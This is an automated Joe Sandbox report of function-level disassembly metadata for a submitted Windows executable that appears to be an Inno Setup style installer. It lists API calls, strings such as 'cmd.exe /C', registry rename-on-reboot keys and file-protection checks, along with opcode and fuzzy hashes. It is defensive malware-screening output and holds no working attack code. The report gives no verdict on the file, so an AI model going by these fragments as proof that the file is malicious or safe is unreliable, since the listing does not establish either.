Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Icon$Extract$FileInfo$CursorDestroyDraw
String ID: c:\directory$shell32.dll
API String ID: 3376378930-1375355148
Opcode ID: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
Instruction ID: bf7570f26ded7c71d3219d2a7bb3c54f33771564a32a8265e6d4c0c3f8c9e6f1
Opcode Fuzzy Hash: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
Instruction Fuzzy Hash: A1517070600248AFDB10DFA5CD89FDE77E9EB49344F5181B7B908AB351D638AE80CB59

Function 004307B4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
GetCurrentThreadId.KERNEL32 ref: 004307E5
GlobalAddAtomA.KERNEL32(00000000), ref: 00430806

Strings

commdlg_help, xrefs: 004307B7
commdlg_FindReplace, xrefs: 004307C6
WndProcPtr%.8X%.8X, xrefs: 004307F7

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
API String ID: 4130936913-2943970505
Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F

Function 0045452C Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 154COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748,00000000), ref: 004546D6
CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748), ref: 004546E3

Part of subcall function 00454498: WaitForInputIdle.USER32(?,00000032), ref: 004544C4
Part of subcall function 00454498: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
Part of subcall function 00454498: GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
Part of subcall function 00454498: CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515

Strings

COMMAND.COM" /C , xrefs: 00454640
cmd.exe" /C ", xrefs: 00454609
.cmd, xrefs: 004545D7
SuG, xrefs: 004546EC
.bat, xrefs: 004545BC
D, xrefs: 00454674

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
String ID: .bat$.cmd$COMMAND.COM" /C $D$SuG$cmd.exe" /C "
API String ID: 854858120-3415487018
Opcode ID: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
Instruction ID: 0ceb2650e422503ffbc7ed56c7a183e4ec77644398bdd85e9c3e3b3e3b1edd4a
Opcode Fuzzy Hash: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
Instruction Fuzzy Hash: 17517F34A0034D6BCB01EF95C881BDDBBB9AF45309F51443BF8047B246D77C9A498759

Function 0042369C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON

Download Yara Rule

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
OemToCharA.USER32(?,?), ref: 0042376C
CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC

Strings

MAINICON, xrefs: 00423721
2, xrefs: 004236FA

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: 2$MAINICON
API String ID: 3935243913-3181700818
Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95

Function 00493968 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

73E9A570.USER32(00000000,?,?,00000000), ref: 00493979

Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7

SelectObject.GDI32(00000000,00000000), ref: 0049399B
GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493F19), ref: 004939AF
GetTextMetricsA.GDI32(00000000,?), ref: 004939D1
73E9A480.USER32(00000000,00000000,004939FB,004939F4,?,00000000,?,?,00000000), ref: 004939EE

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004939A6

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
API String ID: 1435929781-222967699
Opcode ID: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
Instruction ID: ca21cbf5bcaba7d36ec51d0fe3022430e72f204859a7c427f36f75f4196156c5
Opcode Fuzzy Hash: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
Instruction Fuzzy Hash: B30165B6644644AFDB00DFA9CC42F6FB7ECDB49704F514476B504E7281D6789E008B24

Function 00418F48 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
GetCurrentThreadId.KERNEL32 ref: 00418F89
GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA

Part of subcall function 004230D8: 73E9A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
Part of subcall function 004230D8: 73EA4620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
Part of subcall function 004230D8: 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154

Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC

Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D

Strings

Delphi%.8X, xrefs: 00418F5F
ControlOfs%.8X%.8X, xrefs: 00418F9B

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A4620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
String ID: ControlOfs%.8X%.8X$Delphi%.8X
API String ID: 1580766901-2767913252
Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F

Function 0041364C Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
GetWindowLongA.USER32(?,000000F0), ref: 0041367F
GetWindowLongA.USER32(?,000000F4), ref: 00413691
SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
SetPropA.USER32(?,00000000,00000000), ref: 004136BB
SetPropA.USER32(?,00000000,00000000), ref: 004136D2

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
Instruction ID: 1bc0ad651c9199286e8a44efdb6fe1d3d914d8875e882f3995fbdb6b4a12be9e
Opcode Fuzzy Hash: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
Instruction Fuzzy Hash: BD11DD75500244BFDB00DF9DDC84E9A3BECEB19364F104676B918DB2A1D738D990CB94

Function 00454BF4 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D8B,?,00000000,00454DCB), ref: 00454CD1

Strings

PendingFileRenameOperations, xrefs: 00454C70
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C54
PendingFileRenameOperations2, xrefs: 00454CA0
WININIT.INI, xrefs: 00454D00

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
API String ID: 47109696-2199428270
Opcode ID: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
Instruction ID: ef280fa4ab6b1211fd8f84b8c583b28cf46e24a46f503c910aaa6e023c479b4e
Opcode Fuzzy Hash: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
Instruction Fuzzy Hash: 7A51BD70E042089FDB11EF61DC51ADEB7B9EF84709F50857BE804BB282D7789E49CA58

Function 00453084 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530CA
GetLastError.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530D3

Strings

$pI, xrefs: 00453119
.tmp, xrefs: 004530B3
oI, xrefs: 00453158, 00453109, 00453113

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: $pI$.tmp$oI
API String ID: 1375471231-740224434
Opcode ID: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
Instruction ID: 60a70816440fe1ba2c2b61b043faaaddd8f2043f6f52677016a48fb96d3bd8e1
Opcode Fuzzy Hash: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
Instruction Fuzzy Hash: 87211575A002089BDB01EFA5C8429DFB7B9EF48305F50457BE901B7382DA7C9F058BA9

Function 00423A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00423A2C), ref: 00423AB8
GetWindow.USER32(?,00000003), ref: 00423ACD
GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12

Strings

lAB, xrefs: 00423B02, 00423B06

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID: lAB
API String ID: 4191631535-3476862382
Opcode ID: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
Instruction ID: d29b09d819a87149adbd2d005cf1232ad5b3f4e75eba8ff45bdb535110d2bb0d
Opcode Fuzzy Hash: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
Instruction Fuzzy Hash: 3C115E70700610ABDB109F28DC85F5A77E8EB04725F50026AF9A49B2E7C378DD40CB59

Function 0042DD6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495CC7), ref: 0042DD93
GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99

Strings

advapi32.dll, xrefs: 0042DD8E
RegDeleteKeyExA, xrefs: 0042DD89

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressDeleteHandleModuleProc
String ID: RegDeleteKeyExA$advapi32.dll
API String ID: 588496660-1846899949
Opcode ID: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
Instruction ID: 8fc99b955978393d7b704f32c9200af3e348b3abe20e6a9a0cbb7a4975712069
Opcode Fuzzy Hash: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
Instruction Fuzzy Hash: AFE022F0B91A30AAC72023A9BC4AFA32B28CF60725F985137F081B51D182BC0C40CE9C

Function 0048146C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213COMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?,?,00000000,00481781,?,?,00000001,?), ref: 0048157D
SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004815F2

Strings

, xrefs: 004816AF
Need to restart Windows? %s, xrefs: 0048162F

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ActiveChangeNotifyWindow
String ID: $Need to restart Windows? %s
API String ID: 1160245247-4200181552
Opcode ID: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
Instruction ID: 43b26af6fded3664f9a54b7664450519bbda0d3a266c0bb0bb586b013a774d9d
Opcode Fuzzy Hash: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
Instruction Fuzzy Hash: 849191346002449FCB10FB69E986B9E77F5EF55308F0444BBE8109B362DB78A906CB5D

Function 0046EAC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4

GetLastError.KERNEL32(00000000,0046ECBD,?,?,0049B178,00000000), ref: 0046EB9A
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EC14
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EC39

Strings

Creating directory: %s, xrefs: 0046EB82

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: ChangeNotify$ErrorFullLastNamePath
String ID: Creating directory: %s
API String ID: 2451617938-483064649
Opcode ID: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
Instruction ID: f0101e926757b7a11f3b593987eb06ddc2bdb0e2c9eeffddc738206aa7aee8b3
Opcode Fuzzy Hash: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
Instruction Fuzzy Hash: 3B512474E00248ABDB01DFA6C582BDEBBF5AF49304F50857AE811B7382D7785E04CB99

Function 004542F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454464), ref: 00454408

Strings

sfc.dll, xrefs: 00454360
SfcIsFileProtected, xrefs: 00454398

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressByteCharMultiProcWide
String ID: SfcIsFileProtected$sfc.dll
API String ID: 2508298434-591603554
Opcode ID: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
Instruction ID: a5147c4f4f255c42d32950ca2538ad48b34b390a13f5ea4f7af4ed8f8aa420c4
Opcode Fuzzy Hash: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
Instruction Fuzzy Hash: B841A770A403189FEB10DB55DC85B9E77B8AB45309F5080BBB808A7293E7785F89CE5D

Function 00451B70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

751C1520.VERSION(00000000,?,?,?,j]I), ref: 00451B90
751C1500.VERSION(00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BBD
751C1540.VERSION(?,00451C34,?,?,00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BD7

Strings

j]I, xrefs: 00451B76

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

